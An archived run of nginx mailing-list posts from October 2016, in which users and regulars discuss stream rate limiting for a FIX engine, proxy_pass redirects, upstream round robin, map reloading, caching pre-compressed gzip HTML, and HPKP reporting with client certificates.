28 October 2016 at 16:15, CJ Ess wrote: > > Maybe this is what you want: > > https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html > > > > See the parts about proxy_download_rate and proxy_upload_rate > > > > On Thu, Oct 27, 2016 at 11:22 PM, Alex Samad wrote: > >> > >> Yep > >> > >> On 28 October 2016 at 11:57, CJ Ess wrote: > >> > FIX as in the financial information exchange protocol? > >> > > >> > On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad > wrote: > >> >> > >> >> Hi > >> >> > >> >> any one setup nginx infront of a fix engine to do rate limiting ? > >> >> > >> >> Alex > >> >> > >> >> _______________________________________________ > >> >> nginx mailing list > >> >> nginx at nginx.org > >> >> http://mailman.nginx.org/mailman/listinfo/nginx > >> > > >> > > >> > > >> > _______________________________________________ > >> > nginx mailing list > >> > nginx at nginx.org > >> > http://mailman.nginx.org/mailman/listinfo/nginx > >> > >> _______________________________________________ > >> nginx mailing list > >> nginx at nginx.org > >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Fri Oct 28 16:32:14 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 28 Oct 2016 17:32:14 +0100 Subject: Nginx proxy_pass not working as expected. In-Reply-To: <7da33840ac5157f6693bad4e5b855739.NginxMailingListEnglish@forum.nginx.org> References: <7da33840ac5157f6693bad4e5b855739.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161028163214.GA23518@daoine.org> On Fri, Oct 28, 2016 at 10:17:11AM -0400, stuwat wrote: Hi there, > We're trying to point example.com at a site hosted at github... In general, you proxy_pass to something that you control. > So we need example.com to point to the site hosted at example.github.io > > So a user visits example.com they get the page hosted at example.github.com, > but with example.com still in the address bar. You have listed two different github domains there. And neither matches the domain in your example config. Right now, if I "curl -v http://example.github.com", I get a http redirect to http://example.github.io/. When your nginx does that, it will get the same response, and pass it to the browser. And then the browser will make a fresh request to example.github.io which does not go anywhere near your nginx. Perhaps if you did a proxy_pass to http://example.github.io it would work better? (At least, until that remote web site chooses to redirect you somewhere else as well.) f -- Francis Daly francis at daoine.org From francis at daoine.org Fri Oct 28 16:42:32 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 28 Oct 2016 17:42:32 +0100 Subject: round robin rule In-Reply-To: References: Message-ID: <20161028164232.GB23518@daoine.org> On Tue, Oct 25, 2016 at 04:28:22PM -0700, Frank Liu wrote: Hi there, > If I configure one "upstream" with 2 servers and use the default round > robin, will the traffic be balanced based on the upstream or the virtual > servers. e.g.: if I configure 2 virtual host "server" blocks, both > proxy_pass the same upstream, will the requests to each virtual host be > balanced individually? That sounds like it shouldn't be too difficult to test. Have your upstream refer to two different nginx server blocks, and be able to identify in the logs which server was used. Then send a request to vhost1, to vhost2, to vhost1, and to vhost1 again. Did the first two to vhost1 go to the same upstream? And did the last to vhost1 go to the other upstream? I'll be interested in seeing your conclusions. Good luck with it, f -- Francis Daly francis at daoine.org From tolga.ceylan at gmail.com Fri Oct 28 17:46:31 2016 From: tolga.ceylan at gmail.com (Tolga Ceylan) Date: Fri, 28 Oct 2016 10:46:31 -0700 Subject: round robin rule In-Reply-To: <20161028164232.GB23518@daoine.org> References: <20161028164232.GB23518@daoine.org> Message-ID: > On Tue, Oct 25, 2016 at 04:28:22PM -0700, Frank Liu wrote: > > Hi there, > >> If I configure one "upstream" with 2 servers and use the default round >> robin, will the traffic be balanced based on the upstream or the virtual >> servers. e.g.: if I configure 2 virtual host "server" blocks, both >> proxy_pass the same upstream, will the requests to each virtual host be >> balanced individually? > Conceptually rr algorithm runs after 'proxy_pass' so, the overall load would be %50/%50 even if more than one proxy_pass is referencing the same upstream block. From alex at samad.com.au Sat Oct 29 02:42:32 2016 From: alex at samad.com.au (Alex Samad) Date: Sat, 29 Oct 2016 13:42:32 +1100 Subject: nginx and FIX server In-Reply-To: References: Message-ID: Hi Not really an option in current setup. The rate limit is to stop clients with bad fix servers that spam our fix server. Right now we have a custom bit of java code that that bit rate limits tcp streams.. just bought into nginx so looking at stream proxing it through it instead A On 29 October 2016 at 02:48, CJ Ess wrote: > Cool. Probably off topic, but why rate limit FIX? My solution for heavy > traders was always to put them on their own hardware and pass the costs back > to them. They are usually invested in whatever strategy they are using and > happy to pay up. > > > > On Fri, Oct 28, 2016 at 1:29 AM, Alex Samad wrote: >> >> Hi >> >> yeah I have had a very quick look, just wondering if any one on the >> list had set one up. >> >> Alex >> >> On 28 October 2016 at 16:15, CJ Ess wrote: >> > Maybe this is what you want: >> > https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html >> > >> > See the parts about proxy_download_rate and proxy_upload_rate >> > >> > On Thu, Oct 27, 2016 at 11:22 PM, Alex Samad wrote: >> >> >> >> Yep >> >> >> >> On 28 October 2016 at 11:57, CJ Ess wrote: >> >> > FIX as in the financial information exchange protocol? >> >> > >> >> > On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad >> >> > wrote: >> >> >> >> >> >> Hi >> >> >> >> >> >> any one setup nginx infront of a fix engine to do rate limiting ? >> >> >> >> >> >> Alex >> >> >> >> >> >> _______________________________________________ >> >> >> nginx mailing list >> >> >> nginx at nginx.org >> >> >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> > >> >> > >> >> > >> >> > _______________________________________________ >> >> > nginx mailing list >> >> > nginx at nginx.org >> >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> >> >> _______________________________________________ >> >> nginx mailing list >> >> nginx at nginx.org >> >> http://mailman.nginx.org/mailman/listinfo/nginx >> > >> > >> > >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From reallfqq-nginx at yahoo.fr Sat Oct 29 22:04:38 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sun, 30 Oct 2016 00:04:38 +0200 Subject: Dynamically Reload Map In-Reply-To: <74A4D440E25E6843BC8E324E67BB3E394558128B@N060XBOXP38.kroger.com> References: <74A4D440E25E6843BC8E324E67BB3E394558128B@N060XBOXP38.kroger.com> Message-ID: nginx parses configuration as a whole, either on start or on HUP signal. Your map is part of the configuration (separating it in multiple files does not change the fast everything is being merged before being statically interpreted/compiled), thus you need to signal the master process whenever you change it. nginx gracefully finishes processing current requests on old workers while spawning new ones and accepting new connections there. If performance is an issue, I suggest you have a serious look at how you dimensioned your infrastructure, since max the double of workers could use resources at the same time. If not, you will then have to resort to killing old workers manually. --- *B. R.* On Thu, Oct 27, 2016 at 9:44 PM, Cox, Eric S wrote: > Is anyone aware of a way to dynamically reload a file when using the MAP > module without having to reload the server? We have a file that gets > updated roughly every minute that needs reloaded and it seem that doing a > reload every minute on the server processes might cause a performance issue? > > > > Also is anywhere aware of a way to view the current size for the map hash > tables? > > > > Thanks > > ------------------------------ > > This e-mail message, including any attachments, is for the sole use of the > intended recipient(s) and may contain information that is confidential and > protected by law from unauthorized disclosure. Any unauthorized review, > use, disclosure or distribution is prohibited. If you are not the intended > recipient, please contact the sender by reply e-mail and destroy all copies > of the original message. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From reallfqq-nginx at yahoo.fr Sat Oct 29 22:17:20 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sun, 30 Oct 2016 00:17:20 +0200 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <4521b802d545803df2ad2333acd6c95a.NginxMailingListEnglish@forum.nginx.org> References: <4521b802d545803df2ad2333acd6c95a.NginxMailingListEnglish@forum.nginx.org> Message-ID: $http_accept_encoding gets the value of the HTTP Accept-Encoding header. This might vary depending on the client being used, unless you control them and their value. Thus, the same request being made with a different (set of) value(s) in this header will generate another key. If you simply want to check a specific value is being used in this header, you might filter its content through a (series of) map and used the filtered values only as part of a cache key. That is a quick idea, I have put much brains in it, but it could be a step in the direction you want to go. --- *B. R.* On Thu, Oct 27, 2016 at 8:41 PM, seo010 wrote: > Hi! > > I was wondering if anyone has an idea to serve pre-compressed (gzip) HTML > using proxy_cache / fastcgi_cache. > > I tried a solution with a map of http_accept_encoding as part of the > fastcgi_cache_key with gzip compressed output from the script, but it > resulted into strange behavior (the MD5 hash for the first request > corresponds to the KEY, the next requests with an unknown MD5 hash using > the > same KEY. > > Nginx version: 1.11.1 > > The initial solution to serve pre-compressed gzip HTML from proxy_cache / > fastcgi_cache was the following: > > Map: > map $http_accept_encoding $gzip_enabled { > ~*gzip gzip; > } > > Server: > fastcgi_cache_path /path/to/cache/nginx levels=1:2 keys_zone=XXX:20m > max_size=4g inactive=7d; > > PHP-FPM proxy: > set $cache_key "$gzip_enabled$request_method$request_uri"; > > fastcgi_pass unix:/path/to/php-fpm.sock; > fastcgi_index index.php; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > fastcgi_param PHP_VALUE "error_log=/path/to/logs/php.error.log"; > fastcgi_intercept_errors on; > > # full page cache > fastcgi_no_cache $skip_cache_save; > fastcgi_cache_bypass $skip_cache; > fastcgi_cache XXX; > fastcgi_cache_use_stale error timeout invalid_header updating http_500; > fastcgi_ignore_headers Cache-Control Expires Set-Cookie; > fastcgi_cache_valid 200 7d; # valid for 7 days > fastcgi_cache_valid 301 302 304 1h; > fastcgi_cache_valid any 5m; > fastcgi_cache_lock on; > fastcgi_cache_lock_timeout 5s; > fastcgi_cache_key $cache_key; > > add_header X-Cache $upstream_cache_status; > #add_header X-Cache-Key $cache_key; > > include fastcgi_params; > > It did work when testing in 1 browser: it showed "MISS" and "HIT" for 2 > requests. The cache directory showed the correct MD5 hash for the key. > > But when testing the same URL again in a different browser, a yet > unexplained behavior occurred. A totally new MD5 hash was used to store the > same pre-compressed content. When viewing the cached file, the exact same > KEY was shown (without additional spaces or special characters). > > Although the solution with a GZIP parameter may work, I was wondering if > anyone knows of a better solution to serve pre-compressed HTML from Nginx > cache as it results into 4 to 10ms latency saving per request on a idle > quad-core server with 4x SSD in RAID 10. > > I could not find any information related to a solution in Google while it > appears to be a major potential for performance gain on high traffic > websites. > > Best Regards, > Jan Jaap > > Posted at Nginx Forum: https://forum.nginx.org/read. > php?2,270604,270604#msg-270604 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Sun Oct 30 09:24:27 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Sun, 30 Oct 2016 05:24:27 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: Message-ID: Hi *B. R.*! Thanks a lot for the reply and information! The KEY however, does not contain different data from http_accept_encoding. When viewing the contents of the cache file it contains the exact same KEY for both MD5 hashes. Also, it does not matter what browser is used for the first request. For example, using a Google PageSpeed test at the first request will create the expected MD5 hash for the KEY, and a next request using Chrome will create a new hash for a file that contains the line "KEY: ..." that matches the KEY for the first MD5 hash. The third request also has a different KEY. I did not test any further, it may be that the KEY will change for every new client. The KEY does remain the same however for the same client. For example, the first request uses the MD5 hash as expected for the KEY (as generated by MD5) and it will keep using it in next requests. As gzip compression causes a huge overhead on servers with high traffic, I was wondering if Nginx would cache the gzip compressed result and if so, if there is a setting with a maximum cache size. It would however, cause a waste of cache space. In tests the overhead added 4 tot 10ms on a powerful server for every request compared with loading pre-compressed gzip HTML directly. It makes me wonder what will be the effect on servers with high traffic. As there appears to be no solution in Google, finding an answer may be helpful for a lot of websites and it will make Nginx the best option for full page cache. Best Regards, Jan Jaap Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270647#msg-270647 From lucas at lucasrolff.com Sun Oct 30 09:49:35 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Sun, 30 Oct 2016 10:49:35 +0100 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: Message-ID: <5815C22F.7050304@lucasrolff.com> What you could do (I basically asked the same question 1 week ago), is that whenever you fastcgi_pass then enforce accept-encoding: gzip - meaning you'll always request gzipped content from your backend - then you can enable the gunzip directive by using "gunzip on;" This means in case a client that does not support gzip compression, nginx will uncompress the file on the fly - where rest of the requests will be serving the file directly with a content-encoding: gzip - then the supporting client will automatically do whatever it should. First of all it saves you a bunch of storage and it should give you the result you want. Serving (pre)compressed files to clients that support it. -- Best Regards, Lucas Rolff seo010 wrote: > Hi *B. R.*! > > Thanks a lot for the reply and information! The KEY however, does not > contain different data from http_accept_encoding. When viewing the contents > of the cache file it contains the exact same KEY for both MD5 hashes. Also, > it does not matter what browser is used for the first request. For example, > using a Google PageSpeed test at the first request will create the expected > MD5 hash for the KEY, and a next request using Chrome will create a new hash > for a file that contains the line "KEY: ..." that matches the KEY for the > first MD5 hash. > > The third request also has a different KEY. I did not test any further, it > may be that the KEY will change for every new client. The KEY does remain > the same however for the same client. For example, the first request uses > the MD5 hash as expected for the KEY (as generated by MD5) and it will keep > using it in next requests. > > As gzip compression causes a huge overhead on servers with high traffic, I > was wondering if Nginx would cache the gzip compressed result and if so, if > there is a setting with a maximum cache size. It would however, cause a > waste of cache space. > > In tests the overhead added 4 tot 10ms on a powerful server for every > request compared with loading pre-compressed gzip HTML directly. It makes me > wonder what will be the effect on servers with high traffic. > > As there appears to be no solution in Google, finding an answer may be > helpful for a lot of websites and it will make Nginx the best option for > full page cache. > > Best Regards, > Jan Jaap > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270647#msg-270647 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Sun Oct 30 17:03:56 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Sun, 30 Oct 2016 13:03:56 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <5815C22F.7050304@lucasrolff.com> References: <5815C22F.7050304@lucasrolff.com> Message-ID: Hi! It sounds like a good solution to improve the performance, however, I just read the following post by Jake Archibald (Google Chrome developer). "Yeah, ~10% of BBC visitors don?t support gzip compression. It was higher during the day (15-20%) but lower in the evenings and weekends (<10%). Pretty much puts the blame in the direction of corporate proxies." https://www.stevesouders.com/blog/2009/11/11/whos-not-getting-gzip/ It appears that an amount of traffic would require gzip. For high traffic websites it may not be a sufficient solution to guarantee optimal performance. It is not a nice idea to have an aspect of an implemented solution of which the stability and performance cannot be depended on. Imagine a high traffic website that receives a spike in traffic after a TV commercial. If just 5% of traffic would not support gzip, it may cause a load that would reduce the overall performance of the website, potentially causing a loss in revenue and user experience. Load tests may not have been able to show the performance bottleneck, as they may not factor in gzip support and it may not be possible to predict what amount of clients support gzip. If a global website receives a traffic spike, it may be that for a specific geographic area a larger percentage of users does not support gzip, causing the server performance to fail. Best Regards, Jan Jaap Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270649#msg-270649 From lucas at lucasrolff.com Sun Oct 30 17:51:44 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Sun, 30 Oct 2016 18:51:44 +0100 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: <5815C22F.7050304@lucasrolff.com> Message-ID: <58163330.50306@lucasrolff.com> Well - then put fastcgi_ignore_headers Vary, make your map determine if the client support gzip or not, then you'll have 2 entries of everything, 1 gzipped and one not gzipped. I'm not sure how much traffic we're talking about when it's about 'high traffic' - you'd probably want to run your proxy separately anyway, and then you can basically just scale out during peaks anyway. -- Best Regards, Lucas Rolff seo010 wrote: > Hi! > > It sounds like a good solution to improve the performance, however, I just > read the following post by Jake Archibald (Google Chrome developer). > > "Yeah, ~10% of BBC visitors don?t support gzip compression. It was higher > during the day (15-20%) but lower in the evenings and weekends (<10%). > Pretty much puts the blame in the direction of corporate proxies." > > https://www.stevesouders.com/blog/2009/11/11/whos-not-getting-gzip/ > > It appears that an amount of traffic would require gzip. For high traffic > websites it may not be a sufficient solution to guarantee optimal > performance. It is not a nice idea to have an aspect of an implemented > solution of which the stability and performance cannot be depended on. > Imagine a high traffic website that receives a spike in traffic after a TV > commercial. If just 5% of traffic would not support gzip, it may cause a > load that would reduce the overall performance of the website, potentially > causing a loss in revenue and user experience. Load tests may not have been > able to show the performance bottleneck, as they may not factor in gzip > support and it may not be possible to predict what amount of clients support > gzip. If a global website receives a traffic spike, it may be that for a > specific geographic area a larger percentage of users does not support gzip, > causing the server performance to fail. > > Best Regards, > Jan Jaap > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270649#msg-270649 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From lists at localguru.de Sun Oct 30 20:34:26 2016 From: lists at localguru.de (Marcus Schopen) Date: Sun, 30 Oct 2016 21:34:26 +0100 Subject: HPKP report-uri and nginx ssl_verify_client Message-ID: <1477859666.16598.6.camel@cosmo.binux.de> Hi, on a host I'd like to send HPKP reports to ssl_verify_client is set to "optional": ssl_client_certificate /etc/nginx/ssl/CA.pem; ssl_verify_client optional; If HPKP policy fails (for another domain), Chrome (54.0.2840.71 (64-bit)) sends HPKP reports to that reporting host, but the post ends with an "ERR_SSL_CLIENT_AUTH_CERT_NEEDED" error, which in my understanding is not correct, because /hpkp-report path doesn't require a client certificate for authentication. Chrome bug? chrome://net-internals/#events ----------------- 322: URL_REQUEST https://www.example.org/hpkp-report Start Time: 2016-10-30 16:56:20.278 t=4559 [st= 0] +REQUEST_ALIVE [dt=75] t=4559 [st= 0] URL_REQUEST_DELEGATE [dt=0] t=4559 [st= 0] +URL_REQUEST_START_JOB [dt=75] --> load_flags = 1618 (BYPASS_CACHE | DISABLE_CACHE | DO_NOT_SAVE_COOKIES | DO_NOT_SEND_AUTH_DATA | DO_NOT_SEND_COOKIES) --> method = "POST" --> priority = "LOWEST" --> upload_id = "0" --> url = "https://www.example.org/hpkp-report" t=4559 [st= 0] URL_REQUEST_DELEGATE [dt=0] t=4559 [st= 0] HTTP_CACHE_GET_BACKEND [dt=0] t=4559 [st= 0] +HTTP_STREAM_REQUEST [dt=75] t=4559 [st= 0] HTTP_STREAM_REQUEST_STARTED_JOB --> source_dependency = 323 (HTTP_STREAM_JOB) t=4634 [st=75] HTTP_STREAM_REQUEST_BOUND_TO_JOB --> source_dependency = 323 (HTTP_STREAM_JOB) t=4634 [st=75] -HTTP_STREAM_REQUEST t=4634 [st=75] URL_REQUEST_DELEGATE [dt=0] t=4634 [st=75] CANCELLED --> net_error = -110 (ERR_SSL_CLIENT_AUTH_CERT_NEEDED) t=4634 [st=75] -URL_REQUEST_START_JOB --> net_error = -110 (ERR_SSL_CLIENT_AUTH_CERT_NEEDED) t=4634 [st=75] URL_REQUEST_DELEGATE [dt=0] t=4634 [st=75] -REQUEST_ALIVE ----------------- If I type in https://www.example.org/hpkp-report in Chrome's address bar I don't get an SSL error (tested with different clients). Ciao Marcus -- I think we dream so we don't have to be apart so long. If we're in each other's dreams, we can play together all night. -- Calvin From nginx-forum at forum.nginx.org Mon Oct 31 13:11:59 2016 From: nginx-forum at forum.nginx.org (tbaror) Date: Mon, 31 Oct 2016 09:11:59 -0400 Subject: Help how to Proxy without redirect Message-ID: <5d0a66b7df9fb7ed640b210bc04073fc.NginxMailingListEnglish@forum.nginx.org> Hello All, I need to use Nginx as proxy and to pass all communication trough it without redirecting to original web location. I have following configuration file the initial logon and welcome page works well as soon as i click on link its getting redirected in to the original web page. any idea how to keep it on the proxy ? Thanks server { listen 80; return 301 https://$host$request_uri; } server { listen 443; server_name gfn-docker.daet.local; ssl_certificate /etc/nginx/cert.crt; ssl_certificate_key /etc/nginx/cert.key; ssl on; ssl_session_cache shared:SSL:30m; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4; ssl_prefer_server_ciphers on; access_log /var/log/nginx/jenkins.access.log; location / { auth_basic "Restricted Content"; auth_basic_user_file /etc/nginx/.htpasswd; proxy_pass http://192.168.1.60:38080; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270653,270653#msg-270653 From nginx-forum at forum.nginx.org Mon Oct 31 19:08:48 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Mon, 31 Oct 2016 15:08:48 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <58163330.50306@lucasrolff.com> References: <58163330.50306@lucasrolff.com> Message-ID: <223fed1b40731311a813b91ea8d07053.NginxMailingListEnglish@forum.nginx.org> Hi Lucas, Thanks a lot for the suggestion. We were already using that solution but a strange behavior occurred (see opening post). The first request uses an expected MD5 hash of the KEY, and the client will keep using that hash (the MISS/HIT header is accurate). However, requests from other clients will make Nginx use a different (unknown) MD5 hash for the exact same content and KEY. The cache file contains a row with "KEY: ..." that matches the expected KEY and KEY for other MD5 hashes. Do you have an idea what may cause this behavior? Best Regards, Jan Jaap Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270661#msg-270661 From lucas at lucasrolff.com Mon Oct 31 19:45:23 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Mon, 31 Oct 2016 20:45:23 +0100 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <223fed1b40731311a813b91ea8d07053.NginxMailingListEnglish@forum.nginx.org> References: <58163330.50306@lucasrolff.com> <223fed1b40731311a813b91ea8d07053.NginxMailingListEnglish@forum.nginx.org> Message-ID: <58179F53.2090207@lucasrolff.com> Hello, It's not strange behavior, it's expected. What happens is that even though the key is the same - the actual returned content *might* be different, e.g. as an example: If your origin returns Vary: accept-encoding Nginx will cache based on this - so if accept-encoding differs it means the md5 (the path) will be different So if your cache_key is $host$request_uri, if I request http://domain.com/text.html using a standard curl, my accept-encoding won't be there, file will be cached under hash XXXXXXXXXXXXXXXXXXXXX whenever a Google Chrome user comes along, do the exact same request to http://domain.com/text.html the cache_key will still be the same, but since chrome sends gzip, deflate (and some other), nginx will still cache it differently, thus resulting in different md5's on the filesystem. If you use fastcgi_ignore_headers Vary; (I don't see this in the initial post), it shouldn't generate multiple md5's for the same key. Basically nginx cache wants to work as it should and actually obey the vary header, if you don't want to obey it, you should ignore it. And use some other (like gzip_enabled variable) within your cache key to still generate 2 different files. -- Best Regards, Lucas Rolff seo010 wrote: > Hi Lucas, > > Thanks a lot for the suggestion. We were already using that solution but a > strange behavior occurred (see opening post). The first request uses an > expected MD5 hash of the KEY, and the client will keep using that hash (the > MISS/HIT header is accurate). However, requests from other clients will make > Nginx use a different (unknown) MD5 hash for the exact same content and KEY. > The cache file contains a row with "KEY: ..." that matches the expected KEY > and KEY for other MD5 hashes. > > Do you have an idea what may cause this behavior? > > Best Regards, > Jan Jaap > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270661#msg-270661 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Mon Oct 31 19:56:10 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Mon, 31 Oct 2016 15:56:10 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <58179F53.2090207@lucasrolff.com> References: <58179F53.2090207@lucasrolff.com> Message-ID: Hi Lucas, Thanks a lot for the information! Hopefully it will help many others that find the topic via Google as there was almost no information about it available. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270665#msg-270665 From nginx-forum at forum.nginx.org Mon Oct 31 19:59:11 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Mon, 31 Oct 2016 15:59:11 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: <58179F53.2090207@lucasrolff.com> Message-ID: <15ab117bd2f1cc01cca4e140d6dfd730.NginxMailingListEnglish@forum.nginx.org> Just for the record: this topic contains 2 suggested solutions: 1) storing gzip compressed and uncompressed HTML separately and have Nginx determine gzip support instead of the client 2) storing gzip permanently and use Nginx gunzip module to gunzip HTML for browsers without gzip support Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270666#msg-270666